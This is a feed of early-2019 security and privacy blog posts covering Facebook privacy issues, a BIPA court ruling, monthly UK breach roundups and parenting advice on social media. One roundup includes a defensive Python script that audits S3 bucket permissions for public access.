“We hope Spectrum will benefit developers in the same way it has helped Facebook create a better image production experience. In our apps, Spectrum has improved the reliability and quality of image uploads at large scale across our apps. The default integration with Mozilla JPEG allows a reduction of up to 15 percent in upload file size compared with a baseline encoder. We are excited to see how the community uses the Spectrum 1.0.0 library to improve the photo experiences in applications.”

The open source project ‘Spectrum 1.0.0’ is now available on GitHub.

The post Facebook open sources Spectrum for efficient uploading of images appeared first on TechWorm.

Most Facebook users aren’t aware that Facebook tracks their interests

Too many Facebook users aren’t aware that the company uses the information they provide and their actions on the platform and outside of it to create a list of their traits and interests, which is then used to target them with relevant ads.

The survey

According to the results of a new Pew Research Center survey, which polled a representative sample of US-based adult Facebook users, 88% discovered that the site had generated …

The post Most Facebook users aren’t aware that Facebook tracks their interests appeared first on Help Net Security.

WhatsApp – Are You Getting Someone Else's Messages?

WhatsApp is one of the biggest message platforms in the world. It has always prided itself on being reliable and

WhatsApp – Are You Getting Someone Else's Messages? on Latest Hacking News.

Research Suggests Older People More Likely to Share Fake News

When you think about fake news, it might conjure up images of the 2016 US Presidential campaign. It was thought

Research Suggests Older People More Likely to Share Fake News on Latest Hacking News.

The 10 year challenge is taking the Internet by storm

The first few days of 2019 started with a new social media craze that is making its way to the timelines of hundreds of millions of people across all major social media networks – the 10 year challenge. Unless you are one of the few people who do not use social media, you have most likely already noticed the new viral trend, which consists of side-by-side memes of people from ten years ago and today. Millions of people have already participated, and a whole list of celebrities have shared their before-and-after memes with their followers. The challenge is about to blow out of proportion as more and more people enter it by the second.

What exactly is the 10 year challenge?

The challenge consists of people posting then-and-now images of themselves. The old photos go back as far as 2008 and are usually compared to recent photos uploaded to social media. The viral social media trend comes in many forms. Some of the popular hashtags that reflect the hottest social media challenge are #10YearChallenge, #GlowUpChallenge, #2009vs2019, #HowHardDidAgingHitYou, and #agechallenge. The challenge is currently making its way through all major social media platforms, including Facebook, Twitter, Instagram, etc.

Who is behind the challenge?

Currently, it is unknown whether someone started the challenge intentionally. Multiple reporters have speculated that this might be Facebook’s way to collect data that could be mined to train facial recognition algorithms on age progression and age recognition. Nicholas Thompson, the editor of Wired, succeeded in muddying the waters by tweeting “Let’s say you wanted to train a facial recognition algorithm on aging. What would you do? Maybe start a meme like #10yearchallenge”. While this is a question that certainly gives you food for thought, it is still unknown whether the challenge was ignited intentionally by a private company and, if so, what its motives might have been.

Why did the 10 year challenge start now?

When Facebook was founded in 2004, the platform’s initial purpose was to serve as a networking tool for students at Ivy League universities. However, a few years after its launch, Facebook became open to everyone. Roughly 10 years ago, in 2009, Facebook started adding hundreds of millions of new users every day. Some say that the 10 year challenge is going viral right now because of Facebook’s memories tool, which brings images from the past to users’ timelines. Social media users are so fascinated by the difference between the 10-year-old “memory” they see and their current profile picture that they decide to share it with friends and family.

Which celebrities have participated in the 10 year challenge?

The viral trend got popularized by some high profile celebrities such as Reese Witherspoon, Ellen DeGeneres, Nicki Minaj, Trevor Noah, Caitlyn Jenner, and Tyra Banks. Most of them jumped on the bandwagon to simply show how well they still look and how they haven’t aged at all.

How to enter the 10 year challenge?

If you want to enter the viral challenge, all you have to do is dig out a 10-year-old photo of yourself and splice it with a current one. The result should be a side-by-side photograph of yourself ten years apart, similar to the before-and-after diet advertisements that we all see all the time on social media. If you want your side-by-side photo to get noticed, you can post it on any social media channel with the following hashtags: #10YearChallenge, #GlowUpChallenge, #2009vs2019, #2008vs2018, #HowHardDidAgingHitYou, and #agechallenge.


The post The 10 year challenge is taking the Internet by storm appeared first on Panda Security Mediacenter.

Illinois BIPA Suit Dismissed for Lack of Article III Standing

As we previously reported in February 2017, an Illinois federal judge denied a motion to dismiss two complaints brought under the Illinois Biometric Information Privacy Act, 740 ILCS 14 (“BIPA”) by individuals who alleged that Google captured, without the plaintiffs’ consent, biometric data from facial scans of images that were uploaded to Google Photos. The cases subsequently were consolidated, and on December 29, 2018, the Northern District of Illinois dismissed the case on standing grounds, finding that despite the existence of statutory standing under BIPA, neither plaintiff had claimed any injury that would support Article III standing.

In Spokeo, Inc. v. Robins, the Supreme Court held that Article III standing requires a concrete and particularized injury even in the context of a statutory violation. The court here likewise concluded that although the plaintiffs in this case had statutory standing under BIPA, the procedural, statutory violation alone was insufficient to satisfy the standing requirement.

In asking whether either plaintiff adequately alleged such requisite injury, the court considered Google’s collection and retention of the facial scans. With respect to the retention issue, the court followed the 7th Circuit ruling in Gubala v. Time Warner Cable, Inc. that, while in violation of the Cable Communications Policy Act, the retention of individual information alone, without information disclosure or sufficient risk of information disclosure, did not confer Article III standing.

Regarding collection, the court considered (1) Patel v. Facebook Inc., a similar case brought in the Northern District of California that was not dismissed, in which the plaintiff alleged that Facebook’s use of facial recognition for tagging photos violated BIPA’s notice and consent requirements; and (2) common law tort analogues. The Illinois court (1) declined to follow the California court, reasoning that there was an insufficient showing that the Illinois legislature intended to create a cause of action arising from the violation of BIPA’s notice and consent requirements alone; and (2) found that the two common law tort analogues bearing the closest relationship to the alleged injury, intrusion upon seclusion and misappropriation, did not apply here because the harms alleged by the plaintiffs did not align with the harms those torts address. Specifically, the templates that Google created were based on faces, which are regularly publicly exposed, and were not made publicly available or used by Google for commercial purposes. As such, the court dismissed the claim, holding that neither plaintiff had claimed an injury that would support Article III standing.

A number of BIPA actions remain pending in federal and state courts. It remains to be seen whether other courts will agree with the Northern District of Illinois regarding the unavailability of BIPA claims based solely on procedural violations of the act.

A week in security (January 7 – 13)

Last week on the Malwarebytes Labs blog, we took a look at the Ryuk ransomware attack causing trouble over the holidays, as well as a ransom threat for an Irish transportation company. We explored the realm of SSN scams, and looked at what happens when an early warning system is attacked.

Other cybersecurity news

  • Password reuse problems. Multiple Reddit users reported being locked out of their accounts after site admins blamed “password reuse” for the issue. (Source: The Register)
  • 85 rogue apps pulled from Play Store. Sadly, not before some 9 million downloads had already taken place. (Source: Trend Micro)
  • Home router risk. It seems many home routers aren’t doing enough in the fight against hackers. (Source: Help Net Security)
  • Deletion not allowed. Some people aren’t happy they can’t remove Facebook from their Samsung phones. (Source: Bloomberg)
  • Takedown. How a system admin brought down the notorious “El Chapo.” (Source: USA Today)
  • 2FA under fire. A new pentest tool called Mantis can be used to assist in the phishing of OTP (one-time password) codes. (Source: Naked Security)
  • Facebook falls foul of new security laws in Vietnam. New rules have brought a spot of bother for Facebook, accused of not removing certain types of content and of not handing over data related to “fraudulent accounts.” (Source: Vietnam News)
  • Trading site has leak issue. A user on the newly set up trading platform was able to grab a lot of potentially problematic snippets, including authentication tokens and password reset links. (Source: Ars Technica)
  • Local risk to card details. A researcher discovered payment info was being stored locally on machines, potentially exposing it to anyone with physical access. (Source: HackerOne)
  • Facebook exec swatted. The dangerous “gag” of sending armed law enforcement to an address ends up causing problems for a “cybersecurity executive,” after bogus calls claimed they had “pipe bombs all over the place.” (Source: PA Daily Post)

Stay safe, everyone!

The post A week in security (January 7 – 13) appeared first on Malwarebytes Labs.

Smashing Security #110: What? You can get paid to leave Facebook?

Twitter and the not-so-ethical hacking of celebrity accounts, study discovers how you can pay someone to quit Facebook for a year, and the millions of dollars you can make from uncovering software vulnerabilities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

Facebook Accused of Violating Vietnam’s Cyber Law

Vietnam’s controversial cybersecurity law that tightens government control of the online environment just came into effect on Jan. 1 and it’s already claiming its first victim, writes the Financial Times.

On Tuesday, the communist country accused Facebook of not complying with its new law by refusing to immediately delete fan pages with content the government considers defamatory. According to Vietnam’s Authority of Broadcasting and Electronic Information (ABEI), Vietnamese account holders freely published “slanderous content, anti-government sentiment and libel and defamation of individuals, organizations and state agencies.”

The cybersecurity law, passed in June 2018, forms part of Vietnam’s strategy to tighten media control and restrict free speech online.

“This decision has potentially devastating consequences for freedom of expression in Vietnam,” Amnesty International stated at the time. “In the country’s deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities.”

Citing a Vietnamese market research report, the government body accuses Facebook of allowing advertising for scams and fake or illegal products. “The Vietnamese report claimed some $235 million was spent on Facebook ads in 2018, with $152.1 million going to Google,” writes TechCrunch.

As a result, Vietnam wants to penalize Facebook by taxing advertising revenue.

“We have a clear process for governments to report illegal content to us, and we review all these requests against our terms of service and local law,” Facebook responded. “We are transparent about the content restrictions we make in accordance with local law in our Transparency Report.”

Vietnamese authorities requested information on suspicious accounts, but Facebook refused to hand over user data, as it would violate community standards.

61% of apps transfer data to Facebook whether you have an account or not

According to the report “How Apps on Android Share Data with Facebook” by the British NGO Privacy International, 61% of the applications we use transfer data to Facebook the moment a user opens the app, whether or not the user has an account or has logged in. The study analysed […]

Cyber Security Roundup for December 2018

The final Cyber Security Roundup of 2018 rounds up reports of major data breaches, serious software vulnerabilities and evolving cyber threats, so pretty much like the previous 11 months of the year.

5.3 million users of the "make your own avatar" app Boomoji had their accounts compromised after the company reportedly failed to secure its internet-connected databases properly. "Question and Answer" website Quora also announced the compromise of 100 million of its user accounts following a hack.


A large data breach reported in Brazil is of interest: a massive 120 million Brazilian citizens' personal records were compromised due to a poorly secured Amazon S3 bucket. This is not the first mass data breach caused by an insecure S3 bucket we've seen in 2018. The lesson to be learnt in the UK is never to assume or take cloud security for granted; it is essential practice to test and audit cloud services regularly.
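The advice to test and audit cloud services regularly can be put into practice with an offline check like the one below. This is an added example, not code from the roundup: it inspects the decoded bucket policy and ACL documents that `aws s3api get-bucket-policy` (whose `Policy` field is a JSON string) and `aws s3api get-bucket-acl` return, and flags Allow statements whose principal is everyone as well as ACL grants to the AllUsers or AuthenticatedUsers groups. The sample policy and ACL are constructed; the bucket name, role ARN, account id and IP range are placeholders.

```python
"""Flag public-access grants in an S3 bucket policy and bucket ACL.

Added audit example (not from the post). It works on the decoded JSON
documents that `aws s3api get-bucket-policy` (the "Policy" field, which
is returned as a JSON string) and `aws s3api get-bucket-acl` produce.
The SAMPLE_* documents below are constructed for illustration.
"""
import json

# Canned ACL group URIs that S3 uses for "everyone" and "any AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value):
    """Statement, Action and Principal.AWS may be a single value or a
    list in policy JSON; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    """True for "Principal": "*" and for {"AWS": "*"} / {"AWS": ["*", ...]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False


def public_policy_statements(policy):
    """Return (Sid, actions, has_condition) for every Allow statement whose
    principal is everyone. A Condition block (e.g. aws:SourceIp) narrows
    the grant, so it is reported for review rather than silently accepted."""
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements restrict access; they grant nothing
        if not _principal_is_public(stmt.get("Principal")):
            continue
        findings.append((stmt.get("Sid", "<no Sid>"),
                         _as_list(stmt.get("Action")),
                         "Condition" in stmt))
    return findings


def public_acl_grants(acl):
    """Return (group, permission) for ACL grants to the public groups."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GROUPS:
            findings.append((PUBLIC_GROUPS[uri], grant.get("Permission")))
    return findings


def audit_bucket(policy_json, acl):
    """policy_json: the raw policy string from get-bucket-policy (or None
    when the bucket has no policy). acl: the dict from get-bucket-acl."""
    policy = json.loads(policy_json) if policy_json else {}
    report = {
        "policy": public_policy_statements(policy),
        "acl": public_acl_grants(acl),
    }
    report["public"] = bool(report["policy"] or report["acl"])
    return report


# --- constructed sample documents (placeholder names, not real buckets) ---
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "IpLimited", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:ListBucket"],
         "Resource": "arn:aws:s3:::example-bucket",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
        {"Sid": "DenyInsecure", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*",
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
        {"Sid": "AppRole", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/app"},
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

SAMPLE_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    for key, value in audit_bucket(SAMPLE_POLICY, SAMPLE_ACL).items():
        print(key, value)
```

Run it over every bucket in the account rather than the ones you remember creating, and pair it with the S3 Block Public Access setting, which overrides such grants at the account or bucket level. Statements that carry a Condition are listed rather than ignored because a narrowing condition still needs a human to confirm it is tight enough.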

Amongst the amazing and intriguing space exploration successes reported by NASA in December, the space agency announced that its employees' personal data may have been compromised. Let's hope poor security doesn't jeopardise the great and highly expensive work NASA are undertaking.

NASA InSight Lander arrives on Mars

It wouldn't be normal for Facebook not to be in the headlines for poor privacy; this time Facebook announced a Photo API bug which exposed 6.8 million user images.

Away from the political circus that is Brexit, the European Parliament put into law a new Cybersecurity Act. Because Brexit is making all the headlines, this new law may have gone under the radar, but it is certainly worth keeping an eye on, even after the UK leaves the EU. The EU Parliament has agreed to increase the budget for the ENISA (Network & InfoSec) agency, which will be rebranded as the "EU Agency for Cybersecurity". The Cybersecurity Act will establish an EU-wide framework for cyber-security certifications for online services and customer devices to be used within the European Economic Area, and will include IoT devices and critical infrastructure technology. Knowing the EU's love of regulations, I suspect this new best-practice framework and its associated accreditations will be turned into regulations further down the line, which would impact any tech business operating in the European Union.

The UK Parliament enacted the "Health and Social Care (National Data Guardian) Act", which also went under the radar due to all the Brexit political noise. The act requires the appointment of a data guardian for England and Wales. The data guardian will publish guidance on the processing of health and adult social care data for use by public bodies providing health or social care services, and will produce an annual report.

Chinese telecoms giant Huawei had plenty of negative media coverage throughout December, with the UK government pressuring BT into not using Huawei kit within BT's new 5G network, due to a perceived threat to the UK's future critical national infrastructure posed by the Chinese state-backed tech giant. The UK Defence Secretary Gavin Williamson said he had "very deep concerns" about Huawei being involved in the new UK mobile network.

Security company Insinia caused controversy after it took over the Twitter accounts of Eamonn Holmes, Louis Theroux and several other celebrities. Insinia said it had managed the account takeover by analysing the way Twitter handles messages posted by phone, and used that to inject messages onto the targeted accounts. However, Insinia were accused in some quarters of being unethical and of breaking the UK Computer Misuse Act.

Unsecured internet-connected printers are being hacked again; this time they were used to print out messages of support for Swedish YouTube star PewDiePie. A hacker named TheHackerGiraffe was said to have targeted up to 50,000 printers after using Shodan to search for open printer ports online; the scan was said to have found 800,000 vulnerable printers.

A Financial Conduct Authority (FCA) report warned UK banks about their over-reliance on third-party security providers. The FCA said companies "generally lacked board members with strong familiarity or specific technical cyber-expertise. External expertise may be helpful but may also, if overly relied on, undermine the effectiveness of the ‘three lines of defence’ model in identifying and managing cyber-risks in a timely way." The report also warned about supply-chain security, especially the role that firms play in other organisations’ supply chains.

Helping Kids Deal with the Digital Rejection of ‘Ghosting’

Rejection is the unspoken risk that is present when we enter into any relationship, whether a friendship or a romantic relationship. It’s a painful, inescapable part of life that most of us go to great lengths to avoid. That said, there’s a social media phenomenon called “ghosting” that can take the pain of rejection to surprising depths, especially among teens.

Ghosting is when a person (or friend group) you’ve been talking to online suddenly stops all communication without any explanation.

Digital Dismissal

If you’re on the receiving end of the ghosting, consider yourself ghosted. Text conversations abruptly stop. You get blocked on all social media accounts. The ghost untags him or herself in all past photos on your profiles and deletes all past comments, theirs and yours. Direct messages (if not blocked) are marked as “seen” but never get a response.

Ghosting makes it feel as if a relationship never existed, which can leave anyone — child, teen, or adult — feeling hurt, frustrated, betrayed and even traumatized.

A teen named Jess* shared her ghosting experience and described feeling “helpless, confused, and worthless” when a person she considered a boyfriend suddenly disappeared from her life after five months and started talking to another girl online. “One minute we were close and sharing all kinds of deep stuff and then, ‘poof’! He blocked me from his social media, stopped answering my texts, and started ignoring me at school. It’s as if I never existed to him.”

Rejection = Pain

In one study, MRI images showed that the same areas of the brain become activated when we experience a social rejection as when we experience physical pain, which is why rejection can hurt so much. According to Dr. Guy Winch, rejection destabilizes our need to belong and causes us to question our self-worth. “We often respond to romantic rejections by finding fault in ourselves, bemoaning all our inadequacies, kicking ourselves when we’re already down, and smacking our self-esteem into a pulp.” Rather, he clarifies, rejection is often just a matter of being mismatched in several areas such as chemistry, goals, and commitment level.

Micro-rejection 24/7

Thanks to social media, ghosting is not only a term but a common (albeit cruel) way to end an online relationship. Because it’s digital, it’s easier for some people to view others as avatars, and easier to block rather than confront. It doesn’t help that the online culture fosters micro-rejections at every turn, especially for tweens and teens. With every photo that is uploaded, so too is a young person’s bid for approval. It’s not uncommon for a child’s happiness (or lack thereof) to be influenced by the number of likes and comments a photo racks up.

While it may be impossible to protect our kids from painful digital rejections, we can equip them to handle it when and if it comes their way. Here are a few ideas that may help ease the pain of being ghosted.

Acknowledge the hurt

No doubt, being ghosted hurts and can be embarrassing for your child (or anyone, for that matter) to even talk about, so tread lightly if you suspect it. Listen more than you speak and empathize more than you advise if you learn this is a situation your child is experiencing. Acknowledge the real pain of being cut off, dismissed, blocked, and ignored. Ghosting can happen between two people or even with a friend group. If you have had a similar experience and can relate, share it with your child.

Help frame the situation

Tweens and teens often do not have the tools they need in their emotional toolbox to deal with confrontation. Nor are they pros at communicating. So, rather than exit a relationship properly, some kids will find it easier to disappear with a simple click or two. Help your child understand the bigger picture that not all people will act with integrity or kindness. And, not all people are meant to be your friend or romantic match, and that’s okay. There are plenty of people who will value, love, and treat them with respect.

Help set healthy standards

Being ghosted, while painful, is also an opportunity to help your son or daughter define or re-define his or her standards. Ask: What qualities and characteristics do you value in a friend or love interest? What values do you need to share with another person before trusting them? What warning signs should you look for next time to tell that a person isn’t friend material? Advise: Don’t always be the person initiating every conversation, pay attention to the quality of interactions, and don’t pursue people who are unresponsive or constantly “busy.”

Discourage retribution

While some ghosting situations are mild and dismissed quickly, others can leave the person ghosted feeling humiliated, angry, and vengeful. Lashing out at or trolling a ghost online as payback isn’t the answer and will only prolong the pain of being ghosted. Encourage your child to see that discovering the person’s character now is a gift, and that moving on with wisdom and integrity (minus conflict) is the fastest way to heal.

Help them move on

One huge pain point for a person who has been ghosted is that he or she did not get any closure or insight as to why the relationship ended. To help with this, you might suggest your son or daughter write a letter to get all the feelings out, but never mail it. Need the satisfaction of posting that letter online (minus names)? There’s a site for that (warning: language).

Beware of haunting

Haunting is when a ghost tries to reconnect in small ways over time. He or she may resurface to leave a comment or periodic likes to test the re-entry climate. Some may even send a direct message trying to explain the poor behavior. While every situation is different, warn your kids against reconnecting with anyone who would ghost a relationship. Encourage your child to invest time in friends who value friendships and honor the feelings of others.

*Name changed

The post Helping Kids Deal with the Digital Rejection of ‘Ghosting’ appeared first on McAfee Blogs.

Cyber Security Roundup for November 2018

One of the largest data breaches in history was announced by Marriott Hotels at the end of November. A hack was said to have compromised a mind-blowing "half a Billion" hotel guests' personal information over a four-year period. See my post, Marriott Hotels 4 Year Hack Impacts Half a Billion Guests, for the full details. The Radisson Hotel Group also disclosed that its Rewards programme had suffered a data compromise. Radisson said hackers had gained access to a database holding members' names, addresses, email addresses, and in some cases, company name, phone number, and Radisson Rewards member number.

Vision Direct reported a website compromise which impacted users of its website between 3rd and 8th November; some 16,300 people were said to be at risk. A fake Google Analytics script had been placed within its website code by hackers.

Eurostar customers were notified by email to reset their passwords following what were presumably successful automated login attempts against Eurostar accounts using stolen credentials obtained by an unknown method.

Two of the TalkTalk hackers were sentenced to a grand total of 20 months for their involvement in the infamous 2015 blackmail hack, which was said to have cost TalkTalk £77 million. According to the court transcripts, there may have been up to 10 other attackers involved when the hackers attempted to blackmail TalkTalk’s then CEO, Dido Harding, into paying a ransom in Bitcoin to cover up the breach. Has the enterprise, and the judiciary, learned anything from the TalkTalk hack?

Uber was fined £385,000 by the UK Information Commissioner's Office after hackers stole the personal data of 2.7 million UK customers in October and November 2016. Uber attempted to cover up the breach by paying the hackers $100,000 (£78,400) to destroy the stolen customer data. Meanwhile stateside, Uber paid $148m to settle federal charges.

HSBC announced it had suffered a customer data breach between 4th and 14th October 2018 in a suspected "credential stuffing" attack. HSBC didn't state how many customers were impacted, but it is known to have 38 million customers worldwide. HSBC advised its customers to regularly change and use strong passwords and to monitor their accounts for unauthorised activity: sage online banking advice, but I am sure its customers will want to know what has happened.

Facebook is still making the wrong kind of privacy headlines. This time it was reported that Facebook members' private message data was found for sale online, with one instance involving 257,256 stolen profiles and including 81,208 private messages. The report appears to suggest malicious browser extensions, not Facebook, may be behind the data breach.

A report from a UK parliamentary committee warned that the UK government is failing to deliver on protecting the UK's critical national infrastructure (CNI) from cyber attacks. "The threat to critical infrastructure, including the power grid, is growing," the committee reported, with some states, "especially Russia", starting to explore ways of disrupting CNI. An advisory notice also warned that UK companies connected to CNI were being targeted by cyber attackers believed to be in eastern Europe. APT28 (the Russia-based Fancy Bear group) has added the "Cannon" downloader tool to its arsenal, according to researchers.

Amazon's showcase Black Friday sale was hit by a data breach days before it started. The online retail giant said it had emailed affected customers, but refused to provide any details on the extent or nature of the breach. The customer email said: “Our website inadvertently disclosed your email address or name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.”

There was a far more positive security announcement by Amazon about its AWS (cloud) services, with the launch of three new services to simplify and automate AWS security configuration: AWS Control Tower, AWS Security Hub, and AWS Lake Formation. McAfee released its 2019 'Cloud Adoption and Risk Report', which highlights the vital importance of configuring cloud services correctly and securely.

RiskIQ claimed that monitoring for malicious code could have stopped the recent theft of 185,000 British Airways customer records. The Magecart hacker group is believed to be responsible for injecting twenty-two lines of malicious script into the British Airways payment page, which successfully lifted debit and credit card details, including the CVV code.

Finally, according to enSilo, European Windows users are being targeted by a sophisticated malware called 'DarkGate', which has an array of nefarious capabilities, including cryptomining, credential stealing, ransomware, and remote-access takeovers. The DarkGate malware has been found to be distributed via Torrent files disguised as popular entertainment offerings, including Campeones and The Walking Dead, so be careful to avoid becoming infected!

At What Age Should Kids Join Social Media?

Last week, I waved goodbye to my eldest son as he moved halfway across the world to study for a year. I was so emotional at the airport – I couldn’t talk! After many cups of tea and even more stares in an airport café, I had no more tears left and was finally able to pull it together. I must have looked like a crazy cat!

Letting go of our kids is tough. Whether it’s their first day of school, their first sleepover, their first girlfriend or boyfriend or their first social media account – these steps towards independence can be enough to send many of us into a tailspin.

How Do We Know When Our Kids Are Ready for More Independence?

Our main job as parents is to raise our kids to be independent, autonomous, law-abiding individuals. But every child is different, with some maturing far quicker than others. So, how do we know when our kids are ready for important life milestones, particularly joining social media?

What Does the Law Say?

While there is no Australian law that dictates the minimum age kids need to be to join social media, most social media platforms require their users to be 13 years old to set up an account. This is a result of a US federal law, the Children’s Online Privacy Protection Act (COPPA), which affects any social media platform that US citizens can join. It therefore affects nearly all social media platforms worldwide.

What Happens in Reality?

Rightly or wrongly, many kids join social media before the age of 13. Some do this with the consent of their parents, while many don’t. In recognition of the ‘reality of the situation’, many big-time social media players, including Mark Zuckerberg, have been critical of the COPPA legislation claiming it is unrealistic. Zuckerberg even committed to trying to get it overruled – so far, no news!

And this reality hasn’t escaped the attention of the big players. Earlier this month, Instagram released a parents’ guide in which it acknowledges that ‘many younger children (under 13) use the service, often with their parents’ permission’. The parents’ guide, produced in conjunction with US internet safety group ConnectSafely, also advised parents that banning social media may not be the best solution to managing their teen’s digital socialising. Instead, they suggest parents should ensure the lines of communication are always open so that they can work with their kids to find appropriate ways of managing their digital lives. Pretty sound advice if you ask me, but Instagram was criticised for offering self-serving advice and encouraging youngsters to get online.

What to Do?

As the mother of four boys, I can unreservedly tell you that a ‘one size fits all’ approach does not cut it when raising kids. Every child is different. Some kids are more robust and resilient while others are more sensitive and emotional. And that’s OK. The worst thing we can do as parents is assume milestones must be met at the same time everyone else’s children do.

Just like with toilet training, sleepovers and co-ed parties, you (as the parent) are the absolute best judge of when your child is ready for these key steps. And social media is no different. Yes, there is a plethora of advice from experts and ‘experienced’ parents to consider but ultimately, it’s your call as the parent.

What To Consider When Deciding When Your Child Should Join Social Media

So, here are some things to consider when deciding if, and when, your child should join social media. If your tween has already gone ahead and joined, then why not use these points to refine the current usage strategy?

1. Are They Ready?

Chances are your tween will be busting to get onto social media and will absolutely consider themselves ‘ready’! In fact, they may have already gone ahead and created their own profile without consulting you. But if they haven’t and you have a close connection with your kids, then you have a golden opportunity to assess their readiness.

You may decide that your under-13-year-old is mature enough and help them set up social media accounts and profiles. Many believe social media is an inevitable, unavoidable milestone and that it’s best to manage it proactively to avoid underground activity. You may require passwords to be shared and posts to be approved before they are uploaded. If they have proved themselves to be trustworthy after a period of time, you may choose to be less involved.

However, if you have a child who is less mature and who tends to be anxious, you may insist they wait until 13. As we all know, it is not always pretty online. A certain level of resilience and a decent dose of perspective are essential to ride out the bumps. If there is any pushback from your tween, then just talk a lot about the COPPA legislation!

2. Family Policy

If you have a tribe of kids, you may want to consider a family policy on the age your offspring can join social media. Although I am not a believer in ‘one size fits all’, I can tell you from experience that the perception of fairness in a family is very powerful. The arguments over who gets the bigger piece of cake or whose turn it is to sit in the front seat can drive you bonkers!

3. Workshop the ‘Likes Culture’ Before They Embark on Their Social Media Careers

The quest to get likes online can become all-encompassing, particularly when you are navigating your way through your teenage years. Before your kids join up, please have several conversations about the dangerous ‘culture of likes’ that is pervading the online world. Likes are viewed as a measure of social acceptance by many teenagers. The number of likes they do (or don’t) receive can affect their self-esteem and confidence, which is very concerning. Please ensure your kids know they are NOT defined by the number of likes on a post and that this number is NOT reflective of their worth.

4. Set the Ground Rules

Regardless of whether your tween is about to embark on the social media journey or whether they have taken the advanced route, a family technology contract can be a great way of clarifying and formalising your expectations of both their social media usage and behaviour online. If you are looking for a good place to start, check out the contract that The Modern Parent uses. Obviously adapt it for your own situation and children’s needs, but ensure it covers key points including time spent online, sharing of personal information and what to do if a stranger tries to befriend you or if you receive online abuse.

Personally, I think 13 is a great age to kick off one’s social media career. I’m a fan of risk management and I really believe the older kids are, the better they can deal with complex online situations. But I also believe you should trust your gut as a parent. You may have a very mature 12-year-old, with a host of older siblings, who is busting to get on Instagram. Working with them to set up a profile, sharing passwords and mentoring them through their entrée to social media may be a much better option than pushing this inevitable step underground and off your radar.

So, over to you, parents. This is your call! And just to inspire you a little more, let me borrow some words from Scottish actor and father of four daughters, Ewan McGregor:

‘The thing about parenting rules is there aren’t any. That’s what makes it so difficult.’

Good luck!

Alex xx

The post At What Age Should Kids Join Social Media? appeared first on McAfee Blogs.

Cyber Security Roundup for October 2018

Aside from Brexit, cyber threats and cyber-attack accusations against Russia are very much centre stage on the UK government's international political agenda at the moment. The government publicly accused Russia's military intelligence service, the GRU, of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group. The NCSC said GRU hackers, operating under a dozen different names including Fancy Bear (APT28), had targeted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published.
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets, Fontanka.ru and news agency Interfax, in October 2017. They used ransomware to encrypt the contents of a computer and demand payment.
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen.

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica scandal. Facebook could face a new ICO fine after revealing that hackers had accessed the contact details of 30 million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported cyber security incidents, and another report, by law firm RPC, said average ICO fines had doubled and that higher fines should be expected in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as the airline disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious JavaScript code injected in an attack widely attributed to Magecart. Another airline, Cathay Pacific, also disclosed it had suffered a major data breach that impacted 9.4 million customers' personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014. Morrisons said it would now appeal to the Supreme Court; if that appeal fails, those affected will be able to claim compensation for "upset and distress".

